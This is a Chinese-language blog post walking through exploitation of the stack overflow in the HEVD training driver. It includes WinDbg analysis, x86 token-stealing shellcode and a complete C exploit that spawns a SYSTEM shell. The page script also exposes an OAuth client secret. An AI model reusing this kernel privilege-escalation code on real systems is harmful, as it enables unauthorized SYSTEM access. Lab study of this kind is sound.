<!DOCTYPE html>
<html lang="zh">
  <head>
    <title>
        HEVD 栈溢出 - Ryze
      </title>
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
    <meta name="renderer" content="webkit">
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no,email=no,adress=no">
    
    <meta name="theme-color" content="#000000" />
    
    <meta http-equiv="window-target" content="_top" />
    
    
    <meta name="description" content="源码分析 RtlCopyMemory 函数是一个 Windows API 函数，能将一块内存数据从一个地方复制到另一个地方。 存在漏洞的 107 行，Size未做验证，且由 Ring3 决定，所以存在内核栈溢出。" />
    <meta name="generator" content="Hugo 0.78.1 with theme pure" />
    <title>HEVD 栈溢出 - Ryze</title>
    
    
    <link rel="stylesheet" href="https://ryze-t.github.io/css/style.min.5743fa7b2206cb1eb1d7532cda60d1ebf1e3ae4aac4077fc182a92c911e04e02.css">
    
    <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css" async> 
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css" async>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css" async>
    <meta property="og:title" content="HEVD 栈溢出" />
<meta property="og:description" content="源码分析 RtlCopyMemory 函数是一个 Windows API 函数，能将一块内存数据从一个地方复制到另一个地方。 存在漏洞的 107 行，Size未做验证，且由 Ring3 决定，所以存在内核栈溢出。" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ryze-t.github.io/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/" />
<meta property="article:published_time" content="2021-01-18T00:00:00+08:00" />
<meta property="article:modified_time" content="2021-01-18T00:00:00+08:00" />
<meta itemprop="name" content="HEVD 栈溢出">
<meta itemprop="description" content="源码分析 RtlCopyMemory 函数是一个 Windows API 函数，能将一块内存数据从一个地方复制到另一个地方。 存在漏洞的 107 行，Size未做验证，且由 Ring3 决定，所以存在内核栈溢出。">
<meta itemprop="datePublished" content="2021-01-18T00:00:00+08:00" />
<meta itemprop="dateModified" content="2021-01-18T00:00:00+08:00" />
<meta itemprop="wordCount" content="2238">



<meta itemprop="keywords" content="Windows,HEVD," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HEVD 栈溢出"/>
<meta name="twitter:description" content="源码分析 RtlCopyMemory 函数是一个 Windows API 函数，能将一块内存数据从一个地方复制到另一个地方。 存在漏洞的 107 行，Size未做验证，且由 Ring3 决定，所以存在内核栈溢出。"/>

    <!--[if lte IE 9]>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
      <![endif]-->

    <!--[if lt IE 9]>
        <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
      <![endif]-->
  </head>

  
  

  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://github.com/Ryze-T" target="_blank">
            <img class="img-circle img-rotate" src="https://ryze-t.github.io/avatar.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">Ryze</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md">sec</h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>Beijing, China</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="想要查找什么..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts/">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags/">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
            <li class="menu-item menu-item-about">
                <a href="/about/">
                    <i class="icon icon-cup-fill"></i>
                  <span class="menu-title">About</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>

<aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content"><p>~Just for fun~</p>
            </div>
        </div>
    </div>
</div>

      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div id="tag-cloud-list" class="widget-body">
            
            
            <a href="https://ryze-t.github.io/tags/attack/" class="tag-list-link" rel="1">attack<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ryze-t.github.io/tags/hevd/" class="tag-list-link" rel="3">hevd<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ryze-t.github.io/tags/tips/" class="tag-list-link" rel="1">tips<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ryze-t.github.io/tags/translation/" class="tag-list-link" rel="1">translation<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ryze-t.github.io/tags/windows/" class="tag-list-link" rel="3">windows<span
               class="tag-list-count">3</span></a>
            
    </div>
<script>
document.onreadystatechange = () => {
  if (document.readyState === 'complete') {
    tagCloud('#tag-cloud-list a',  8 ,  20 );
  }
};

function tagCloud(where, min, max) {
  let iMax = 0;
  let iMin = 0;
  $(where).each(function() {
    let weight = Number($(this).attr("rel"));
    if(iMax < weight) iMax = weight;
    if(iMin > weight || iMin == 0) iMin = weight;
  });
  let step = (max - min)/(iMax - iMin);
  $(where).each(function() {
    let weight = $(this).attr("rel") - iMin;
    $(this).css({"font-size": min + (weight * step) + 'px'});
  });
};
</script>
</div>

      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div class="widget-body">
        <ul class="tag-list">
            
            
            <li class="tag-list-item"><a href="https://ryze-t.github.io/tags/attack/" class="tag-list-link">attack</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ryze-t.github.io/tags/hevd/" class="tag-list-link">hevd</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ryze-t.github.io/tags/tips/" class="tag-list-link">tips</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ryze-t.github.io/tags/translation/" class="tag-list-link">translation</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ryze-t.github.io/tags/windows/" class="tag-list-link">windows</a><span
                    class="tag-list-count">3</span></li>
            
        </ul>

    </div>
</div>
      
<div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ryze-t.github.io/2021/01/cmd%E7%BC%BA%E9%99%B7/" class="title">Cmd缺陷</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-01-25 00:00:00 &#43;0800 CST" itemprop="datePublished">01-18</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ryze-t.github.io/2021/01/hevd-uaf/" class="title">HEVD UAF</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-01-19 00:00:00 &#43;0800 CST" itemprop="datePublished">01-18</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ryze-t.github.io/2021/01/hevd-%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E8%A6%86%E7%9B%96/" class="title">HEVD 任意内存覆盖</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-01-19 00:00:00 &#43;0800 CST" itemprop="datePublished">01-18</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ryze-t.github.io/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/" class="title">HEVD 栈溢出</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-01-18 00:00:00 &#43;0800 CST" itemprop="datePublished">01-18</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <h4 class="toc-title">文章目录</h4>
    <nav id="toc" class="js-toc toc">

    </nav>
  </div>
</aside>
<main class="main" role="main"><div class="content">
  <article id="-" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/"
    >HEVD 栈溢出</a
  >
</h1>

      <div class="article-meta">
        
<span class="article-date">
  <i class="icon icon-calendar-check"></i>&nbsp;
<a href="https://ryze-t.github.io/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/" class="article-date">
  <time datetime="2021-01-18 00:00:00 &#43;0800 CST" itemprop="datePublished">01-18</time>
</a>
</span>
  
  <span class="article-tag">
    <i class="icon icon-tags"></i>&nbsp;
    <a class="article-tag-link" href="/tags/windows/"> Windows </a>
    <a class="article-tag-link" href="/tags/hevd/"> HEVD </a>
  </span>

        <span class="post-comment"><i class="icon icon-comment"></i>&nbsp;<a href="/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/#comments"
            class="article-comment-link">评论</a></span>
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 2238字</span>
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 5分 </span>
      </div>
    </div>
    <div class="article-entry marked-body js-toc-content" itemprop="articleBody">
      <h2 id="源码分析">源码分析</h2>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201109233410820-20210118233553728.png" alt="image-20201109233410820"></p>
<p>RtlCopyMemory 函数是一个 Windows API 函数，能将一块内存数据从一个地方复制到另一个地方。</p>
<p>存在漏洞的 107 行，Size未做验证，且由 Ring3 决定，所以存在内核栈溢出。</p>
<h2 id="漏洞分析">漏洞分析</h2>
<h3 id="ida-pro-打开驱动">IDA pro 打开驱动</h3>
<p>找到 TriggerStackOverflow的方法有两种：通过 IOCTL 和 特定函数。</p>
<h4 id="通过-ioctl">通过 IOCTL：</h4>
<p>HEVD 的 IOCTL 通过 IrpDeviceIoCtlHandler 实现：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201111201709062-20210118233553834.png" alt="image-20201111201709062"></p>
<p>当 eax = 0x222003h 时，程序调用 StackOverflow 模块：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201111202316880-20210118233554003.png" alt="image-20201111202316880"></p>
<p>因此当 IOCTL = 0x222003h时，程序调用 StackOverflow 模块。</p>
<h4 id="通过函数">通过函数：</h4>
<p>找到内存拷贝函数 __memcpy，x 查看调用情况，找到 TriggerStackOverflow</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201109234239865-20210118233554114.png" alt="image-20201109234239865"></p>
<p>进入地址</p>
<p>调用函数 ProbeForRead，此函数是用来判断这块内存是否为 Ring3 的内存，大小为 0x800h</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110101240480-20210118233554218.png" alt="image-20201110101240480"></p>
<p>下方输出调试信息，也调用了 esi，即 KernelBuffer Size 为 0x800h：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110101549236-20210118233554317.png" alt="image-20201110101549236"></p>
<p>调用 __memcpy  的函数在模块开始处偏移 0x8F 处</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110001858912-20210118233554422.png" alt="image-20201110001858912"></p>
<h3 id="在-windbg-中调试">在 windbg 中调试</h3>
<p>在 TriggerStackOverflow 开始处、调用 __memcpy 处下断点</p>
<pre><code>bu HEVD!TriggerStackOverflow
bu HEVD!TriggerStackOverflow+0x8f
</code></pre>
<h4 id="第0处断点">第0处断点：</h4>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110091716749-20210118233554523.png" alt="image-20201110091716749"></p>
<p>查看寄存器：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110093801980-20210118233554625.png" alt="image-20201110093801980"></p>
<p>esp中存储的是返回地址，即 0x980f7ad4</p>
<h4 id="第1处断点">第1处断点：</h4>
<p>调用 memcpy 函数</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110092947727-20210118233554712.png" alt="image-20201110092947727"></p>
<p>查看寄存器：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110093955694-20210118233554818.png" alt="image-20201110093955694"></p>
<p>查看 esp ：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110094445144-20210118233554917.png" alt="image-20201110094445144"></p>
<p>调用函数前，会将参数依次 push，因此此处 esp 指向的 0x980f72b4 就是 memcpy 函数的第一个参数 KernelBuffer的地址。</p>
<p><strong>此处利用栈溢出原理：通过利用 memcpy 函数，覆盖返回地址为shellcode地址，从而调用 shellcode</strong></p>
<p>因此需要计算偏移，即  ：</p>
<p>TriggerStackOverflow 返回地址（esp）- memcpy调用的第一个参数KernelBuffer（[esp]） = 0x820</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201110095137463-20210118233555014.png" alt="image-20201110095137463"></p>
<h2 id="漏洞利用">漏洞利用</h2>
<p>根据分析所得的信息， KernelBuffer = 0x800h，KernelBuffer 到返回地址的偏移为 0x820h，因此，填充偏移 0x820为 shellcode 地址即可执行 shellcode</p>
<h3 id="尝试">尝试</h3>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
#define STACKOVERFLOW  0x222003

int main()
{
	char buf[0x824];
	DWORD bReturn = 0;
	HANDLE hDevice;
	hDevice = CreateFileA(&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;,  //打开的设备名称
		GENERIC_READ | GENERIC_WRITE,		// 对所打开的设备可读可写
		FILE_SHARE_READ | FILE_SHARE_WRITE,		//请求共享模式。对其属性或扩展属性的访问请求进行约束，必须与第二参数匹配
		NULL,
		OPEN_EXISTING,	//仅打开存在的设备
		FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,		//默认属性，允许对设备进行重叠操作
		NULL
	);
	printf(&quot;Get Handle...\n&quot;);
	if (hDevice == NULL || hDevice == INVALID_HANDLE_VALUE)		// 返回句柄为空或不可用
	{
		printf(&quot;Failed to get Handle...\n&quot;);
		return 0;
	}
	memset(buf, 'T', 0x824);		//内存填充 0x824 个 T
	printf(&quot;exploit...\n&quot;);
	DeviceIoControl(hDevice,		//设备句柄
		STACKOVERFLOW,		//操作控制码
		buf,			//输入缓冲区的指针
		0x824,		//输入缓冲区的大小，字节数
		NULL,		//驱动程序返回给应用程序的数据缓冲区地址
		0,			//驱动程序返回给应用程序的数据缓冲区大小，字节数
		&amp;bReturn,	//驱动程序实际返回给应用程序的数据字节数地址
		NULL);		//重叠操作
}
</code></pre>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201111204134352-20210118233555116.png" alt="image-20201111204134352"></p>
<p>EIP 和 EBP 都被覆盖，说明此时已经覆盖了 EIP 可以控制程序执行流程。</p>
<h3 id="提权代码">提权代码</h3>
<h4 id="windbg-下提权过程">windbg 下提权过程</h4>
<h5 id="查看进程">查看进程</h5>
<pre><code>!dml_proc 查看进程
</code></pre>
<p><!-- raw HTML omitted --></p>
<pre><code>address 是EPROCESS（executive process block，进程执行块）的地址，记录该进程的关键信息
PID 是 进程号，system 的进程号为 4
</code></pre>
<h5 id="查看-token-位置">查看 token 位置</h5>
<pre><code>dt命令主要用来查看相关的变量，结构体等的信息
</code></pre>
<p><!-- raw HTML omitted --></p>
<pre><code>查看 EPROCESS 类型结构，token 位于偏移 0xf8 处，结构为 _EX_FAST_REF
</code></pre>
<h5 id="查看-systemexe-和-cmdexe-token">查看 system.exe 和 cmd.exe token：</h5>
<pre><code>nt指内核
_EX_FAST_REF 指 token 的 结构
因为 token 在 EPROCESS 结构偏移 f8 的位置，所以查看 token 时要加 f8
</code></pre>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201018162050253-20210118233555214.png" alt="image-20201018162050253"></p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201018162131252-20210118233555309.png" alt="image-20201018162131252"></p>
<pre><code>system 进程 token 的值为 0x8ac01275
cmd 进程 token 的值为 0xa2087036
</code></pre>
<h5 id="替换-token-以提权">替换 token 以提权</h5>
<pre><code>ed 可以修改4字节内存值
g 可以让系统继续执行
</code></pre>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201018164009611-20210118233555404.png" alt="image-20201018164009611"></p>
<p>修改后让系统继续执行并输入 whoami：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201018164029958-20210118233555509.png" alt="image-20201018164029958"></p>
<p>过程的关键在于如何找到 EPROCESS。</p>
<p>x86 上，FS 段寄存器用于指向 TEB（环境进程块）和 KPCR（处理器控制区），其偏移 0x124 为当前线程的 KTHREAD，KTHREAD 结构的偏移0x50处为 KPROCESS 结构，KPROCESS 结构是 EPROCESS 结构的第一个字段，因此也定位到了 EPROCESS。</p>
<p>再通过 EPROCESS 偏移 0xB8 处的双向进程链表、偏移 0xB4 处的进程标识符以及System进程的进程标识符 4 遍历链表匹配到 System 进程。</p>
<p>最后将 system EPROCESS 结构偏移 0xF8 处的 token 替换 当前 cmd 的 token</p>
<h4 id="汇编代码">汇编代码</h4>
<pre><code>pushad
mov eax, fs:[124h]				//将当前线程的 KTHREAD 地址存入 eax
mov eax, [eax + 050h]			//将 KPROCESS 结构首地址存入 eax
mov ecx, eax							//将 EPROCESS 结构首地址存入 ecx
mov edx, 4								//将 system pid 4 存入 edx

find_sys_pid :
					 mov eax, [eax + 0b8h]			//将双向进程活动链表地址存入 eax
					 sub eax, 0b8h							//双向链表遍历
					 cmp[eax + 0b4h], edx				//比较进程 pid 是否为 4
					 jnz find_sys_pid						//PID != 4 时循环执行

					 mov edx, [eax + 0f8h]			//将 system 进程的 token 赋给 edx
					 mov[ecx + 0f8h], edx				//将edx的值赋给当前线程的 token 
					 popad
</code></pre>
<p>此处还需要考虑一个问题，堆栈平衡。</p>
<p>程序在读写数据的时候是通过地址查找的,如果函数调用之前的堆栈与函数调用之后的堆栈不一致,就可能导致找不到数据或找到的数据错误,有可能会导致程序崩溃。</p>
<p>所以要使用 IDA pro，查看驱动在未进行利用时，正常的执行情况。</p>
<p>在上述找到 TriggerStackOverflow 后，在 IDA pro 中输入 x 查看调用情况：</p>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201112193309199-20210118233555622.png" alt="image-20201112193309199"></p>
<p>跟进：</p>
<p><!-- raw HTML omitted --></p>
<p>程序在最后调用结束后，需要执行 pop ebp 与 ret 8</p>
<p>在函数调用过程中，还会有 3 个 push</p>
<pre><code>push ebx
push esi
push edi
</code></pre>
<p>故最后的汇编应为：</p>
<pre><code>pop edi
pop esi
pop ebx
pushad
mov eax, fs:[124h]				//将当前线程的 KTHREAD 地址存入 eax
mov eax, [eax + 050h]			//将 KPROCESS 结构首地址存入 eax
mov ecx, eax							//将 KPROCESS 结构首地址存入 ecx
mov edx, 4								//将 system pid 4 存入 edx

find_sys_pid :
					 mov eax, [eax + 0b8h]			//将双向进程活动链表地址存入 eax
					 sub eax, 0b8h							//双向链表遍历
					 cmp[eax + 0b4h], edx				//比较进程 pid 是否为 4
					 jnz find_sys_pid						//PID != 4 时循环执行

					 mov edx, [eax + 0f8h]			//将 system 进程的 token 赋给 edx
					 mov[ecx + 0f8h], edx				//将edx的值赋给当前线程的 token 
					 popad
					 pop ebp 
					 ret 8
</code></pre>
<h3 id="exp">EXP</h3>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
#define STACKOVERFLOW  0x222003

VOID ShellCode()
{
	__asm
	{
		pop    edi
		pop    esi
		pop    ebx
		pushad
		mov eax, fs:[124h]
		mov eax, [eax + 050h]
		mov ecx, eax
		mov edx, 4

		find_sys_pid :
					 mov eax, [eax + 0b8h]
					 sub eax, 0b8h
					 cmp[eax + 0b4h], edx
					 jnz find_sys_pid

					 mov edx, [eax + 0f8h]
					 mov[ecx + 0f8h], edx
					 popad
					 pop ebp
					 ret 8
	}
}

int main()
{
	char buf[0x824];
	DWORD bReturn = 0;
	HANDLE hDevice;
	hDevice = CreateFileA(&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;,  //打开的设备名称
		GENERIC_READ | GENERIC_WRITE,		// 对所打开的设备可读可写
		FILE_SHARE_READ | FILE_SHARE_WRITE,		//请求共享模式。对其属性或扩展属性的访问请求进行约束，必须与第二参数匹配
		NULL,
		OPEN_EXISTING,	//仅打开存在的设备
		FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,		//默认属性，允许对设备进行重叠操作
		NULL
	);
	printf(&quot;Get Handle...\n&quot;);
	if (hDevice == NULL || hDevice == INVALID_HANDLE_VALUE)		// 返回句柄为空或不可用
	{
		printf(&quot;Failed to get Handle...\n&quot;);
		return 0;
	}
	memset(buf, 'T', 0x824);		//内存填充 0x824 个 T
	*(PDWORD)(buf + 0x820) = (DWORD)&amp;ShellCode;
	printf(&quot;exploit...\n&quot;);
	DeviceIoControl(hDevice,		//设备句柄
		STACKOVERFLOW,		//操作控制码
		buf,			//输入缓冲区的指针
		0x824,		//输入缓冲区的大小，字节数
		NULL,		//驱动程序返回给应用程序的数据缓冲区地址
		0,			//驱动程序返回给应用程序的数据缓冲区大小，字节数
		&amp;bReturn,	//驱动程序实际返回给应用程序的数据字节数地址
		NULL);		//重叠操作
	system(&quot;cmd.exe&quot;);
	return 0;
}
</code></pre>
<h3 id="结果">结果</h3>
<p><img src="https://gitee.com/tboom_is_here/picture-bed/raw/master/uPic/image-20201119230852763-20210118233555729.png" alt="image-20201119230852763"></p>
<h2 id="参考">参考</h2>
<p>参考 <a href="https://github.com/ThunderJie/Windows-Kernel-Exploit">ThunderJie</a></p>

    </div>
    <div class="article-footer">
<blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接: </strong>
      <a href="https://ryze-t.github.io/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/" title="HEVD 栈溢出" target="_blank" rel="external">https://ryze-t.github.io/2021/01/hevd-%E6%A0%88%E6%BA%A2%E5%87%BA/</a>
    </li>
    <li class="post-copyright-license">
      <strong>License: </strong>
        <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0</a>
    </li>
  </ul>
</blockquote>

<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/Ryze-T" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="https://ryze-t.github.io/avatar.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/Ryze-T" target="_blank"><span class="text-dark">Ryze</span><small class="ml-1x">sec</small></a></h3>
        <div>Attack and Crack</div>
      </div>
    </figure>
  </div>
</div>

    </div>
  </article>
<section id="comments">
</section>

</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="next">
                <a href="https://ryze-t.github.io/about/"
                    title="About"><span>上一篇&nbsp;&nbsp;</span><i
                        class="icon icon-angle-right" aria-hidden="true"></i></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="文章目录" role="button">
                    <span>[&nbsp;</span><span>文章目录</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
            <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter"
                data-mobile-sites="weibo,qq,qzone"></div>
        </div>
    </div>
</nav>


</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
<ul class="social-links">
    <li><a href="https://github.com/Ryze-T" target="_blank" title="github" data-toggle=tooltip data-placement=top >
            <i class="icon icon-github"></i></a></li>
    <li><a href="https://ryze-t.github.io/index.xml" target="_blank" title="rss" data-toggle=tooltip data-placement=top >
            <i class="icon icon-rss"></i></a></li>
</ul>
  <div class="copyright">
    &copy;2021  -
    2021
    <div class="publishby">
        京ICP备2020047629号<br>
        Theme by xiaoheiAh base on pure
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
<script>
    window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js" defer></script><script>
    hljs.configure({
        tabReplace: '    ', 
        classPrefix: ''     
        
    })
    hljs.initHighlightingOnLoad();
</script>
<script src="https://ryze-t.github.io/js/application.min.bdeb64b910570b6c41badc6a05b7afb0c8ad9efd8525de3c7257d59e786326a3.js"></script>
<script src="https://ryze-t.github.io/js/plugin.min.51ff8c7317566f82259170fa36e09c4493adc9b9378b427a01ad3f017ebac7dd.js"></script>

<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(未命名)',
            },
            ROOT_URL: 'https:\/\/ryze-t.github.io',
            CONTENT_URL: 'https:\/\/ryze-t.github.io\/searchindex.json ',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script type="text/javascript" src="https://ryze-t.github.io/js/insight.min.a343cd9a5a7698336b28ef3a7c16a3a1b1d2d5fb17dc8ed04022bbe08cc5459073a15bdafa3a8a58cdd56080784bdd69fa70b1ae8597565c799c57ed00f0e120.js" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
<script>
    tocbot.init({
        
        tocSelector: '.js-toc',
        
        contentSelector: '.js-toc-content',
        
        headingSelector: 'h1, h2, h3',
        
        hasInnerContainers: true,
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/gitalk@1.4.0/dist/gitalk.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/blueimp-md5@2.10.0/js/md5.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '6d912887a278a8267017',
        clientSecret: '39543a6480907d0abe2dd5161993b37d9501586f',
        repo: 'issues',
        owner: 'Ryze-T',
        admin: ['Ryze-T'],
        id: md5(location.pathname),
        distractionFreeMode: true
    });
    gitalk.render('comments');
</script>

  </body>
</html>
